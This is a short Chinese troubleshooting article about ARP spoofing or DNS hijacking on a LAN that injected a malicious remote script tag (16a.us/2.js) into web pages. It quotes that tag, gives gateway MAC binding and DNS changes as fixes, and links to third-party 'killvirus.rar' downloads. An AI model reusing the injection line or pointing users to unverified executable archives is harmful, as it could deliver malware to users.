解决http://16a.us/2.js之arp欺骗的方法附专杀工具
发布时间:2016-12-26 来源:查字典编辑
摘要:公司局域网访问所有页面都加上了代码,这次是客户端打开的所有网页,故可排除是服务器环境遭遇arp欺骗,综合网上各方意见,得出结论:本地网关或d...
公司局域网访问所有页面都加上了<scriptsrc=http://16a.us/2.js></script>代码,
这次是客户端打开的所有网页,故可排除是服务器环境遭遇arp欺骗,综合网上各方意见,得出结论:本地网关或dns被劫持,修复本地连接后故障消除。
根本解决方法,绑定网关mac地址,方法为:
命令行输入arp-s网关IP网关MAC
关于网关MAC,可使用arp命令查询。
如果是dns被劫持,则更改dns服务器。
关于js加密解密的两篇文章,想研究上面病毒脚本的朋友可能用得着
http://bbs.blueidea.com/viewthread.php?tid=2665835&page=1#pid2702392
http://bbs.blueidea.com/viewthread.php?tid=2440360
16a.us专杀工具下载地址:
http://free.ys168.com/infile/note/note_6.htm?http://ys-H.ys168.com/?killvirus.rar_72e7bspnnht1bkp0c0c0com1biu14z97f1o0bsjtpm4z
http://hzyo.com/killvirus.rar